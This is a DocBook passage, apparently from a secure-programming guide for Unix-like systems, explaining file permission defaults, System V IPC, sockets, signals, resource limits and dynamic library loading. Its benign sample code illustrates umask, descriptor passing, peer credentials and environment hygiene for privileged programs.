|
||
</sect2>
|
||
|
||
<sect2 id="fso-initial-values">
|
||
<title>Creation Time Initial Values</title>
|
||
|
||
<para>
|
||
At creation time, the following rules apply.
|
||
On most Unix systems, when a new filesystem object is created via creat(2)
|
||
or open(2), the FSO UID is set to the process' EUID and the FSO's GID is
|
||
set to the process' EGID.
|
||
Linux works slightly differently due to its FSUID
|
||
extensions; the FSO's UID is set to the process' FSUID, and the FSO GID
|
||
is set to the process' FSGID; if the
|
||
containing directory's setgid bit is set or the filesystem's
|
||
``GRPID'' flag is set, the FSO GID is actually set to the
|
||
GID of the containing directory.
|
||
Many systems, including Sun Solaris and Linux, also support the
|
||
setgid directory extensions.
|
||
As noted earlier,
|
||
this special case supports ``project'' directories: to make a ``project''
|
||
directory, create a special group for the project,
|
||
create a directory for the project owned by that group, then make the
|
||
directory setgid: files placed there
|
||
are automatically owned by the project.
|
||
Similarly, if a new subdirectory is created inside a directory with the
|
||
setgid bit set (and the filesystem GRPID isn't set), the new subdirectory
|
||
will also have its setgid bit set (so that project subdirectories will
|
||
``do the right thing''); in all other cases the setgid bit is clear for a new file.
|
||
This is the rationale for the ``user-private group'' scheme
|
||
(used by Red Hat Linux and some others).
|
||
In this scheme,
|
||
every user is a member of a ``private'' group with just themselves as members,
|
||
so their defaults can permit the group to read and write any file
|
||
(since they're the only member of the group).
|
||
Thus, when the file's group membership
|
||
is transferred this way, read and write privileges
|
||
are transferred too.
|
||
<!-- http://www.redhat.com/support/manuals/RHL-6.2-Manual/ref-guide/s1-sysadmin-usr-grps.html -->
|
||
FSO basic access control values (read, write, execute) are computed from
|
||
(requested values & ~ umask of process).
|
||
New files always start with a clear sticky bit and clear setuid bit.
|
||
</para>
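<para>
The umask rule can be seen directly.
The following C sketch creates a file while a chosen umask is in effect
and reports the permission bits the file actually received.
It assumes a writable /tmp; mode_after_umask() is a hypothetical name
used only for this illustration.
<programlisting width="61">
<![CDATA[
```c
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical demo: create a file asking for the bits
   in requested while the umask is mask.  Returns the
   resulting permission bits, or (mode_t)-1 on error. */
mode_t mode_after_umask(mode_t requested, mode_t mask)
{
    char dir[] = "/tmp/umask-demo-XXXXXX";
    char path[64];
    struct stat st;
    mode_t old, result = (mode_t)-1;
    int fd;

    if (mkdtemp(dir) == NULL)
        return result;
    snprintf(path, sizeof(path), "%s/new", dir);

    old = umask(mask);          /* install the test umask */
    fd = open(path, O_CREAT | O_EXCL | O_WRONLY,
              requested);
    umask(old);                 /* restore the old umask */

    if (fd >= 0) {
        if (fstat(fd, &st) == 0)
            result = st.st_mode & 0777;
        close(fd);
        unlink(path);
    }
    rmdir(dir);
    return result;
}
```
]]>
</programlisting>
For example, requesting 0666 under a umask of 027 yields 0640,
that is, (0666 & ~027).
</para>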
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="changing-acls">
|
||
<title>Changing Access Control Attributes</title>
|
||
|
||
<para>
|
||
You can set most of these values with chmod(2), fchmod(2), or chmod(1);
see also chown(1) and chgrp(1).
|
||
In Linux, some of the Linux-unique attributes are manipulated using chattr(1).
|
||
</para>
|
||
|
||
<para>
|
||
Note that in Linux, only root can change the owner of a given file.
|
||
Some Unix-like systems allow ordinary users to transfer ownership of their
|
||
files to another, but this causes complications and is forbidden by Linux.
|
||
For example, if you're trying to limit disk usage,
|
||
allowing such operations would allow users to claim that large files
|
||
actually belonged to some other ``victim''.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="using-acls">
|
||
<title>Using Access Control Attributes</title>
|
||
|
||
<para>
|
||
Under Linux and most Unix-like systems, read and write
permissions are checked only when the file is opened; they
|
||
are not re-checked on every read or write.
|
||
Still, a large number of calls do check these attributes,
|
||
since the filesystem is so central to Unix-like systems.
|
||
Calls that check these attributes
|
||
include open(2), creat(2), link(2), unlink(2), rename(2),
|
||
mknod(2), symlink(2), and socket(2).
|
||
</para>
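<para>
To see that permissions are checked at open time rather than on each
read, consider this minimal C sketch.
It opens a temporary file, removes every permission bit, and then reads
through the descriptor it already holds.
The name read_after_chmod0() is hypothetical, and the sketch assumes a
writable /tmp.
<programlisting width="61">
<![CDATA[
```c
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical demo: returns the number of bytes read
   from a file after its permission bits were cleared,
   or -1 on failure. */
ssize_t read_after_chmod0(void)
{
    char path[] = "/tmp/open-check-XXXXXX";
    char buf[4];
    ssize_t n = -1;
    int fd = mkstemp(path);   /* opened read/write */

    if (fd < 0)
        return -1;
    if (write(fd, "data", 4) == 4 &&
        fchmod(fd, 0) == 0 &&         /* mode 0000 now */
        lseek(fd, 0, SEEK_SET) == 0)
        n = read(fd, buf, sizeof(buf)); /* no re-check */
    close(fd);
    unlink(path);
    return n;
}
```
]]>
</programlisting>
The practical consequence is that revoking permissions on a file does not
cut off processes that already have it open.
</para>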
|
||
|
||
</sect2>
|
||
|
||
<sect2 id="filesystem-hierarchy">
|
||
<title>Filesystem Hierarchy</title>
|
||
|
||
<para>
|
||
Over the years conventions have been built on ``what files to place where''.
|
||
Where possible,
|
||
please follow conventional use when placing information in the hierarchy.
|
||
For example, place global configuration information in /etc.
|
||
The Filesystem Hierarchy Standard (FHS) tries to
|
||
define these conventions in a logical manner, and is widely used by
|
||
Linux systems.
|
||
The FHS is an update to the previous
|
||
Linux Filesystem Structure standard (FSSTND), incorporating lessons
|
||
learned and approaches from Linux, BSD, and System V systems.
|
||
See <ulink
|
||
url="http://www.pathname.com/fhs">http://www.pathname.com/fhs</ulink> for more information about the FHS.
|
||
A summary of these conventions is in hier(5) for Linux
|
||
and hier(7) for Solaris.
|
||
Sometimes different conventions disagree; where possible, make these
|
||
situations configurable at compile or installation time.
|
||
</para>
|
||
|
||
<para>
|
||
I should note that the FHS has been adopted by the
|
||
<ulink url="http://www.linuxbase.org">Linux Standard Base</ulink> which
|
||
is developing and promoting a set of standards to increase
|
||
compatibility among Linux distributions and to enable
|
||
software applications to run on any compliant Linux system.
|
||
</para>
|
||
|
||
</sect2>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="sysv-ipc">
|
||
<title>System V IPC</title>
|
||
|
||
<para>
|
||
Many Unix-like systems, including
|
||
Linux and System V systems, support System V interprocess communication
|
||
(IPC) objects.
|
||
Indeed, System V IPC is required by the
|
||
Open Group's Single UNIX Specification, Version 2
|
||
[Open Group 1997].
|
||
<!-- ???: how about BSD variants? -->
|
||
<!-- ???: is this the same as "POSIX shm"? John Levon asked; I think
|
||
they're the same but I'm not certain. -->
|
||
System V IPC objects can be one of three kinds:
|
||
System V message queues, semaphore sets, and shared memory segments.
|
||
Each such object has the following attributes:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
read and write permissions for each of creator, creator group, and
|
||
others.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
creator UID and GID - UID and GID of the creator of the object.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
owning UID and GID - UID and GID of the owner of the
|
||
object (initially equal to the creator UID and GID).
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
When accessing such objects, the rules are as follows:
|
||
|
||
<itemizedlist>
|
||
<listitem>
|
||
|
||
<para>
|
||
if the process has root privileges, the access is granted.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
if the process' EUID is the owner or creator UID of the object,
|
||
then the appropriate creator permission bit is
|
||
checked to see if access is granted.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
if the process' EGID is the owner or creator GID of the object,
|
||
or one of the process' groups is the owning or creating GID of the object,
|
||
then the appropriate creator group permission bit is checked for access.
|
||
</para>
|
||
</listitem>
|
||
<listitem>
|
||
|
||
<para>
|
||
otherwise, the appropriate ``other'' permission bit is checked
|
||
for access.
|
||
</para>
|
||
</listitem>
|
||
|
||
</itemizedlist>
|
||
|
||
</para>
|
||
|
||
<para>
|
||
Note that root, or a process with the EUID of either the owner or creator,
|
||
can set the owning UID and owning GID and/or remove the object.
|
||
More information is available in ipc(5).
|
||
</para>
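<para>
As a small illustration of these attributes, the following C sketch
creates a private shared memory segment with mode 0600, reads back its
permission structure with shmctl(2), and removes it again.
The function name private_shm_mode() is hypothetical, and the sketch
assumes System V IPC is enabled on the running kernel.
<programlisting width="61">
<![CDATA[
```c
#include <sys/ipc.h>
#include <sys/shm.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical demo: create a private segment and return
   its permission bits, or -1 on failure (including the
   case where creator or owner UID is not our EUID). */
int private_shm_mode(void)
{
    struct shmid_ds ds;
    int mode = -1;
    int id = shmget(IPC_PRIVATE, 4096, IPC_CREAT | 0600);

    if (id < 0)
        return -1;
    /* Creator and owner both start as the caller's EUID. */
    if (shmctl(id, IPC_STAT, &ds) == 0 &&
        ds.shm_perm.cuid == geteuid() &&
        ds.shm_perm.uid == geteuid())
        mode = ds.shm_perm.mode & 0777;
    shmctl(id, IPC_RMID, NULL);   /* always clean up */
    return mode;
}
```
]]>
</programlisting>
Note that System V IPC objects persist until they are explicitly removed,
which is why the sketch calls IPC_RMID even on the failure path.
</para>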
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="sockets">
|
||
<title>Sockets and Network Connections</title>
|
||
|
||
<para>
|
||
<!-- Sockets are supported by System V according to Linux's socket(2) -->
|
||
Sockets are used for communication, particularly over a network.
|
||
Sockets were originally developed by the
|
||
BSD branch of Unix systems, but they are generally portable to other
|
||
Unix-like systems: Linux and System V variants support sockets as well, and
|
||
socket support is required by the Open Group's
|
||
Single Unix Specification [Open Group 1997].
|
||
System V systems traditionally used a different (incompatible) network
|
||
communication interface, but it's worth noting that systems like Solaris
|
||
include support for sockets.
|
||
Socket(2) creates an endpoint for communication and returns a descriptor,
|
||
in a manner similar to open(2) for files.
|
||
The parameters for socket specify the protocol family and type,
|
||
such as the Internet domain (TCP/IP version 4), Novell's IPX,
|
||
or the ``Unix domain''.
|
||
A server then typically calls bind(2), listen(2), and accept(2) or select(2).
|
||
A client typically calls bind(2) (though that may be omitted) and
|
||
connect(2).
|
||
See these routines' respective man pages for more information.
|
||
It can be difficult to understand how to use sockets from their man pages;
|
||
you might want to consult other papers such as
|
||
Hall "Beej" [1999]
|
||
to learn how these calls are used together.
|
||
</para>
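<para>
The server and client call sequences above can be sketched in a single
process, using the loopback interface so that no real network is needed.
This is only an illustration under those assumptions; loopback_roundtrip()
is a hypothetical name, and a real server would of course run the two
halves in separate processes and handle errors more carefully.
<programlisting width="61">
<![CDATA[
```c
#include <arpa/inet.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical demo: run the server and client call
   sequences in one process over the loopback interface.
   Returns the byte the server side received, or -1. */
int loopback_roundtrip(void)
{
    struct sockaddr_in addr;
    socklen_t len = sizeof(addr);
    int srv, cli = -1, conn = -1, result = -1;
    char c = 0;

    srv = socket(AF_INET, SOCK_STREAM, 0);
    if (srv < 0)
        return -1;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    addr.sin_port = htons(0);   /* let the kernel pick */

    /* Server side: bind, listen, then (below) accept. */
    if (bind(srv, (struct sockaddr *)&addr,
             sizeof(addr)) == 0 &&
        listen(srv, 1) == 0 &&
        getsockname(srv, (struct sockaddr *)&addr,
                    &len) == 0) {
        /* Client side: bind is omitted, just connect. */
        cli = socket(AF_INET, SOCK_STREAM, 0);
        if (cli >= 0 &&
            connect(cli, (struct sockaddr *)&addr,
                    sizeof(addr)) == 0 &&
            (conn = accept(srv, NULL, NULL)) >= 0 &&
            write(cli, "x", 1) == 1 &&
            read(conn, &c, 1) == 1)
            result = c;
    }
    if (conn >= 0)
        close(conn);
    if (cli >= 0)
        close(cli);
    close(srv);
    return result;
}
```
]]>
</programlisting>
</para>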
|
||
|
||
<para>
|
||
The ``Unix domain sockets'' don't actually represent a network protocol; they
|
||
can only connect to sockets on the same machine
(at the time of this writing, for the standard Linux kernel).
|
||
When used as a stream, they are fairly similar to named pipes, but with
|
||
significant advantages.
|
||
In particular, a Unix domain stream socket is connection-oriented; each new connection to
|
||
the socket results in a new communication channel, a very different situation
|
||
than with named pipes.
|
||
Because of this property, Unix domain sockets are often used instead of
|
||
named pipes to implement IPC for many important services.
|
||
Just like you can have unnamed pipes, you can have unnamed Unix domain sockets
|
||
using socketpair(2); unnamed Unix domain sockets
|
||
are useful for IPC in a way similar to unnamed pipes.
|
||
</para>
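<para>
Here is a minimal sketch of an unnamed Unix domain socket pair created
with socketpair(2).
For brevity both ends are used from one process; in practice the pair is
usually created before fork(2) so that parent and child each keep one end.
The name socketpair_ping_pong() is hypothetical.
<programlisting width="61">
<![CDATA[
```c
#include <sys/socket.h>
#include <unistd.h>

/* Hypothetical demo: exchange "ping" and "pong" over an
   unnamed Unix domain socket pair.  reply must hold 5
   bytes.  Returns 0 on success, -1 on failure. */
int socketpair_ping_pong(char reply[5])
{
    int sv[2];
    char request[5];
    int rc = -1;

    if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) != 0)
        return -1;
    /* Both ends can send and receive. */
    if (write(sv[0], "ping", 5) == 5 &&
        read(sv[1], request, 5) == 5 &&
        write(sv[1], "pong", 5) == 5 &&
        read(sv[0], reply, 5) == 5)
        rc = 0;
    close(sv[0]);
    close(sv[1]);
    return rc;
}
```
]]>
</programlisting>
</para>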
|
||
|
||
<para>
|
||
There are several interesting security implications of Unix domain sockets.
|
||
First, although Unix domain sockets can appear in the filesystem and can have
|
||
stat(2) applied to them, you can't use open(2) to open them (you have
|
||
to use the socket(2) and friends interface).
|
||
Second, Unix domain sockets can be used to pass
|
||
file descriptors between processes (not just the file's contents).
|
||
This odd capability, not available in any other IPC mechanism, has been used
|
||
to hack all sorts of schemes (the descriptors can basically
|
||
be used as a limited version of the
|
||
``capability'' in the computer science sense of the term).
|
||
File descriptors are sent using sendmsg(2), where the msg (message)'s
|
||
field msg_control points to an array of control message headers
|
||
(field msg_controllen must specify the number of bytes contained in the array).
|
||
Each control message is a struct cmsghdr followed by data, and for this purpose
|
||
you want the cmsg_type set to SCM_RIGHTS.
|
||
A file descriptor is retrieved through recvmsg(2) and then tracked down in
|
||
the analogous way.
|
||
Frankly, this feature is quite baroque, but it's worth knowing about.
|
||
</para>
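<para>
Since the descriptor-passing interface is hard to follow from a prose
description, here is a minimal sketch of both directions.
The helper names send_fd() and recv_fd() and the union fd_control are
hypothetical, chosen for this example; the sketch passes exactly one
descriptor per message and does only basic error checking.
<programlisting width="61">
<![CDATA[
```c
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <unistd.h>

/* Room for one control message carrying one descriptor. */
union fd_control {
    struct cmsghdr align;   /* forces correct alignment */
    char buf[CMSG_SPACE(sizeof(int))];
};

/* Hypothetical helper: pass fd over the Unix domain
   socket sock.  Returns 0 on success, -1 on failure. */
int send_fd(int sock, int fd)
{
    union fd_control ctl;
    struct msghdr msg;
    struct iovec iov;
    struct cmsghdr *cmsg;
    char byte = 'F';    /* one ordinary data byte */

    memset(&msg, 0, sizeof(msg));
    memset(&ctl, 0, sizeof(ctl));
    iov.iov_base = &byte;
    iov.iov_len = 1;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctl.buf;
    msg.msg_controllen = sizeof(ctl.buf);

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_SOCKET;
    cmsg->cmsg_type = SCM_RIGHTS;
    cmsg->cmsg_len = CMSG_LEN(sizeof(int));
    memcpy(CMSG_DATA(cmsg), &fd, sizeof(int));

    return sendmsg(sock, &msg, 0) == 1 ? 0 : -1;
}

/* Hypothetical helper: receive a descriptor sent by
   send_fd().  Returns the new descriptor, or -1. */
int recv_fd(int sock)
{
    union fd_control ctl;
    struct msghdr msg;
    struct iovec iov;
    struct cmsghdr *cmsg;
    char byte;
    int fd;

    memset(&msg, 0, sizeof(msg));
    memset(&ctl, 0, sizeof(ctl));
    iov.iov_base = &byte;
    iov.iov_len = 1;
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = ctl.buf;
    msg.msg_controllen = sizeof(ctl.buf);

    if (recvmsg(sock, &msg, 0) != 1)
        return -1;
    cmsg = CMSG_FIRSTHDR(&msg);
    if (cmsg == NULL ||
        cmsg->cmsg_level != SOL_SOCKET ||
        cmsg->cmsg_type != SCM_RIGHTS ||
        cmsg->cmsg_len != CMSG_LEN(sizeof(int)))
        return -1;
    memcpy(&fd, CMSG_DATA(cmsg), sizeof(int));
    return fd;
}
```
]]>
</programlisting>
The received descriptor is a new descriptor number in the receiving
process that refers to the same open file as the one that was sent.
A receiver should treat it with the same suspicion as any other input
from the peer.
</para>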
|
||
|
||
<para>
|
||
Linux 2.2 and later
|
||
supports an additional feature in Unix domain sockets: you can
|
||
acquire the peer's ``credentials'' (the pid, uid, and gid).
|
||
Here's some sample code:
|
||
<programlisting width="61">
|
||
<![CDATA[
|
||
/* Needs <stdio.h> and <sys/socket.h>; with glibc, define
   _GNU_SOURCE before the includes to get struct ucred.
   fd = file descriptor of Unix domain socket connected
   to the client you wish to identify */

struct ucred cr;
socklen_t cl = sizeof(cr);

if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cr, &cl) == 0) {
  printf("Peer's pid=%d, uid=%d, gid=%d\n",
         (int) cr.pid, (int) cr.uid, (int) cr.gid);
}
|
||
]]>
|
||
</programlisting>
|
||
</para>
|
||
|
||
<para>
|
||
Standard Unix convention is that binding to
|
||
TCP and UDP local port numbers less than 1024 requires
|
||
root privilege, while any process can bind to an unbound port number
|
||
of 1024 or greater.
|
||
Linux follows this convention;
|
||
more specifically, Linux requires a process to have the
|
||
capability CAP_NET_BIND_SERVICE to bind to a port number less than 1024;
|
||
this capability is normally only held by processes with an EUID of 0.
|
||
The adventurous can check this by examining the Linux source code;
in Linux 2.2.12, see the file <filename>/usr/src/linux/net/ipv4/af_inet.c</filename>,
|
||
function inet_bind().
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="signals">
|
||
<title>Signals</title>
|
||
|
||
<para>
|
||
Signals are a simple form of ``interruption'' in the Unix-like OS world,
|
||
and are an ancient part of Unix.
|
||
A process can send a signal to another process (say using
kill(1) or kill(2)), and that other process receives and
handles the signal asynchronously.
|
||
For a process to have permission to send an arbitrary
|
||
signal to some other process,
|
||
the sending process must either have root privileges, or
|
||
the real or effective user ID of the sending process
|
||
must equal the real or saved set-user-ID of the receiving process.
|
||
However, some signals can be sent in other ways.
|
||
In particular, SIGURG can be delivered over a network through the
|
||
TCP/IP out-of-band (OOB) message.
|
||
</para>
|
||
|
||
<para>
|
||
Although signals are an ancient part of Unix, they've had different
|
||
semantics in different implementations.
|
||
Basically, they involve questions such as ``what happens when a signal
|
||
occurs while handling another signal''?
|
||
The older Linux libc 5 used a different set of semantics for some signal
|
||
operations than the newer GNU libc libraries.
|
||
Calling C library functions is often unsafe within a
|
||
signal handler, and even some system calls aren't safe;
|
||
you need to examine the documentation for each call you make to see
|
||
if it promises to be safe to call inside a signal handler.
|
||
For more information, see the glibc FAQ (on some systems a local
|
||
copy is available at <filename>/usr/doc/glibc-*/FAQ</filename>).
|
||
</para>
|
||
|
||
<para>
|
||
For new programs, just use the POSIX signal system
|
||
(which in turn was based on BSD work); this set is widely supported
|
||
and doesn't have some of the problems
|
||
that some of the older signal systems did.
|
||
The POSIX signal system is based on using the sigset_t datatype,
|
||
which can
|
||
be manipulated through a set of operations: sigemptyset(),
|
||
sigfillset(), sigaddset(), sigdelset(), and sigismember().
|
||
You can read about these in sigsetops(3).
|
||
Then use sigaction(2), sigprocmask(2),
|
||
sigpending(2), and sigsuspend(2) to set up and manipulate signal handling
|
||
(see their man pages for more information).
|
||
</para>
|
||
|
||
<para>
|
||
In general, make any signal handlers very short and simple, and
|
||
look carefully for race conditions.
|
||
Signals, since they are by nature asynchronous,
|
||
can easily cause race conditions.
|
||
</para>
|
||
|
||
<para>
|
||
A common convention exists for servers: if you receive SIGHUP, you should
|
||
close any log files, reopen and reread configuration files, and then
|
||
re-open the log files.
|
||
This supports reconfiguration without halting the server and
|
||
log rotation without data loss.
|
||
If you are writing a server where this convention makes sense,
|
||
please support it.
|
||
</para>
|
||
|
||
<para>
|
||
Michal Zalewski [2001] has written an excellent tutorial on how
|
||
signal handlers are exploited, and has recommendations for how to
|
||
eliminate signal race problems.
|
||
I encourage looking at his summary for more information; here are
|
||
my recommendations, which are similar to Michal's work:
|
||
<itemizedlist>
|
||
<listitem><para>
|
||
Where possible, have your signal handlers unconditionally set a specific flag
|
||
and do nothing else.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
If you must have more complex signal handlers,
|
||
use only calls specifically designated as being safe for use
|
||
in signal handlers.
|
||
In particular,
|
||
don't use malloc() or free() in C (which on most systems
|
||
aren't protected against signals), nor the many functions that depend on them
|
||
(such as the printf() family and syslog()).
|
||
You could try to ``wrap'' calls to unsafe library functions with a check
|
||
to a global flag (to avoid re-entry), but I wouldn't recommend it.
|
||
</para></listitem>
|
||
<listitem><para>
|
||
Block signal delivery during all non-atomic operations in the program, and
|
||
block signal delivery inside signal handlers.
|
||
</para></listitem>
|
||
</itemizedlist>
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="quotas">
|
||
<title>Quotas and Limits</title>
|
||
|
||
<para>
|
||
Many Unix-like systems have
|
||
mechanisms to support filesystem quotas and process resource limits.
|
||
This certainly includes Linux.
|
||
These mechanisms are particularly useful for preventing denial of service
|
||
attacks; by limiting the resources available to each user, you can make
|
||
it hard for a single user to use up all the system resources.
|
||
Be careful with terminology here, because both filesystem quotas
|
||
and process resource limits have ``hard'' and
|
||
``soft'' limits but the terms mean slightly different things.
|
||
</para>
|
||
|
||
<para>
|
||
You can define storage (filesystem) quota limits on each mountpoint
|
||
for the number of blocks of storage and/or the number of unique files
|
||
(inodes) that can be used, and you can set such limits for a given user
|
||
or a given group.
|
||
A ``hard'' quota limit is a never-to-exceed limit, while a
|
||
``soft'' quota can be temporarily exceeded.
|
||
See quota(1), quotactl(2), and quotaon(8).
|
||
</para>
|
||
|
||
<para>
|
||
The rlimit mechanism supports a large number of process quotas, such as
|
||
file size, number of child processes, number of open files, and so on.
|
||
There is a ``soft'' limit (also called the current limit) and a
|
||
``hard limit'' (also called the upper limit).
|
||
The soft limit cannot be exceeded at any time, but a process can raise it
(for example, with setrlimit(2)) up to the value of the hard limit.
|
||
See getrlimit(2), setrlimit(2), getrusage(2), sysconf(3), and
|
||
ulimit(1).
|
||
Note that there are several ways to set these limits, including the
|
||
PAM module pam_limits.
|
||
</para>
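<para>
A process can adjust its own soft limits with getrlimit(2) and
setrlimit(2).
The sketch below is one hedged way to do so; set_soft_limit() is a
hypothetical helper that clamps the requested value to the hard limit
rather than failing.
<programlisting width="61">
<![CDATA[
```c
#include <sys/resource.h>

/* Hypothetical helper: set the soft limit for resource
   to wanted, clamped to the hard limit.
   Returns 0 on success, -1 on failure. */
int set_soft_limit(int resource, rlim_t wanted)
{
    struct rlimit rl;

    if (getrlimit(resource, &rl) != 0)
        return -1;
    /* The soft limit may never exceed the hard limit. */
    if (rl.rlim_max != RLIM_INFINITY &&
        wanted > rl.rlim_max)
        wanted = rl.rlim_max;
    rl.rlim_cur = wanted;
    return setrlimit(resource, &rl);
}
```
]]>
</programlisting>
For instance, calling set_soft_limit(RLIMIT_CORE, 0) asks the kernel not
to write core files for the process, and lowering RLIMIT_NOFILE bounds
the number of descriptors a misbehaving request can consume.
</para>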
|
||
|
||
</sect1>
|
||
|
||
<sect1 id="dlls">
|
||
<title>Dynamically Linked Libraries</title>
|
||
|
||
<para>
|
||
Practically all programs depend on libraries to execute.
|
||
In most modern Unix-like systems, including Linux,
|
||
programs are by default compiled to use <emphasis remap="it">dynamically linked libraries</emphasis>
|
||
(DLLs).
|
||
That way, you can update a library and all the programs using that library
|
||
will use the new (hopefully improved) version if they can.
|
||
</para>
|
||
|
||
<para>
|
||
Dynamically linked libraries are typically placed in one of a few special
|
||
directories. The usual directories include
|
||
<filename>/lib</filename>, <filename>/usr/lib</filename>, <filename>/lib/security</filename>
|
||
for PAM modules,
|
||
<filename>/usr/X11R6/lib</filename> for X-windows, and <filename>/usr/local/lib</filename>.
|
||
You should use these standard conventions in your programs. In particular,
except during debugging, you shouldn't use a value computed from the
current directory as a source for dynamically linked libraries (an
attacker may be able to supply their own choice of ``library'' there).
|
||
</para>
|
||
|
||
<para>
|
||
There are special conventions for naming libraries and having symbolic
|
||
links for them, with the result that you can update libraries and still
|
||
support programs that want to use old, non-backward-compatible versions
|
||
of those libraries.
|
||
There are also ways to override specific libraries or even just
|
||
specific functions in a library when executing a particular program.
|
||
This is a real advantage of Unix-like systems over
|
||
Windows-like systems; I believe Unix-like systems have a much better system
|
||
for handling library updates, one reason that Unix and Linux systems are reputed
|
||
to be more stable than Windows-based systems.
|
||
</para>
|
||
|
||
<para>
|
||
On GNU glibc-based systems, including nearly all Linux systems,
|
||
the list of directories automatically searched during program start-up is
|
||
stored in the file /etc/ld.so.conf.
|
||
Many Red Hat-derived distributions don't normally
|
||
include <filename>/usr/local/lib</filename>
|
||
in the file <filename>/etc/ld.so.conf</filename>.
|
||
I consider this a bug, and adding <filename>/usr/local/lib</filename> to
|
||
<filename>/etc/ld.so.conf</filename>
|
||
is a common ``fix'' required to run many programs on Red Hat-derived systems.
|
||
If you want to just override a few functions in a library, but keep the
|
||
rest of the library, you can enter the names of overriding libraries
|
||
(.so files) in <filename>/etc/ld.so.preload</filename>;
|
||
these ``preloading'' libraries will take precedence over the standard set.
|
||
This preloading file is typically used for emergency patches;
|
||
a distribution usually won't include such a file when delivered.
|
||
Searching all of these directories at program start-up would be too
|
||
time-consuming, so a caching arrangement is actually used.
|
||
The program ldconfig(8) by default reads in the file /etc/ld.so.conf,
|
||
sets up the appropriate symbolic links in the dynamic link directories
|
||
(so they'll follow the standard conventions),
|
||
and then writes a cache to /etc/ld.so.cache that's then used by other
|
||
programs.
|
||
So, ldconfig has to be run whenever a DLL is added, when a DLL is removed,
|
||
or when the set of DLL directories changes; running ldconfig is often
|
||
one of the steps performed by package managers
|
||
when installing a library.
|
||
On start-up, then, a program uses the dynamic loader to
|
||
read the file /etc/ld.so.cache and then load the libraries it needs.
|
||
</para>
|
||
|
||
<para>
|
||
Various environment variables can control this process, and in fact
|
||
there are environment variables that permit you to
|
||
override this process (so, for example, you can temporarily
|
||
substitute a different library for this particular execution).
|
||
In Linux,
|
||
the environment variable
|
||
LD_LIBRARY_PATH is a colon-separated set of directories where libraries
|
||
are searched for first, before the standard set of directories;
|
||
this is useful when debugging a new library or using a nonstandard
|
||
library for special purposes, but be sure you trust those who can
|
||
control those directories.
|
||
The variable LD_PRELOAD lists shared libraries with functions that override
the standard set, just as /etc/ld.so.preload does.
The variable LD_DEBUG displays debugging information; if set
|
||
to ``all'', voluminous information about the dynamic linking process
|
||
is displayed while it's occurring.
|
||
</para>
|
||
|
||
<para>
|
||
Permitting user control over dynamically linked libraries
|
||
would be disastrous for setuid/setgid programs if special measures
|
||
weren't taken.
|
||
Therefore, in the GNU glibc implementation, if the program is setuid or setgid
|
||
these variables (and other similar variables) are ignored or greatly
|
||
limited in what they can do.
|
||
The GNU glibc library determines if a program is setuid or setgid
|
||
by checking the program's credentials;
|
||
if the UID and EUID differ, or the GID and the EGID differ, the
|
||
library presumes the program is setuid/setgid (or descended from one)
|
||
and therefore greatly limits its abilities to control linking.
|
||
If you examine the GNU glibc source code, you can see this; see especially
|
||
the files elf/rtld.c and sysdeps/generic/dl-sysdep.c.
|
||
This means that if you cause the UID and GID to equal the EUID and EGID,
|
||
and then call a program, these variables will have full effect.
|
||
Other Unix-like systems handle the situation differently but for the
|
||
same reason: a setuid/setgid program should not be unduly affected
|
||
by the environment variables set.
|
||
Note that graphical user interface toolkits generally do permit
|
||
user control over dynamically linked libraries, because
|
||
executables that directly invoke graphical user interface toolkits
|
||
should never, ever, be setuid (or have other special privileges) at all.
|
||
For more about how to develop secure GUI applications, see
|
||
<xref linkend="minimize-privileged-modules">.
|
||
</para>
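<para>
As a rough illustration of the check described above, the following
Python sketch compares the real and effective IDs and, rather than
passing the inherited environment along to a helper program, builds a
small fresh one.
The function names, the safe PATH value, and the list of variables to
keep are assumptions made for this example; they are not taken from glibc.
</para>
<programlisting>
```python
import os

# Assumptions for this sketch: a fixed safe PATH and a short list of
# variables worth passing through. Neither comes from glibc.
SAFE_PATH = "/usr/bin:/bin"
PASS_THROUGH = ("TZ",)


def ids_differ():
    """True if the real and effective UID or GID differ (the test described above)."""
    return os.getuid() != os.geteuid() or os.getgid() != os.getegid()


def minimal_environment(inherited):
    """Build a new environment from scratch; LD_* and everything else is dropped."""
    fresh = {"PATH": SAFE_PATH}
    for name in PASS_THROUGH:
        if name in inherited:
            fresh[name] = inherited[name]
    return fresh


if __name__ == "__main__":
    print("IDs differ:", ids_differ())
    print(minimal_environment(dict(os.environ)))
```
</programlisting>
<para>
A privileged program that sets its real IDs equal to its effective IDs
and then runs a helper could pass the result as the env argument of
subprocess.run(), so that LD_PRELOAD and similar variables never reach
the helper.
A real program would also need to validate the values it passes through.
</para>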
|
||
|
||
<para>
|
||
For Linux systems, you can get more information from my document, the
|
||
<ulink url="http://www.dwheeler.com/program-library"><emphasis>Program Library HOWTO</emphasis></ulink>.
|
||
</para>
|
||
|
||
</sect1>
|
||
|
||
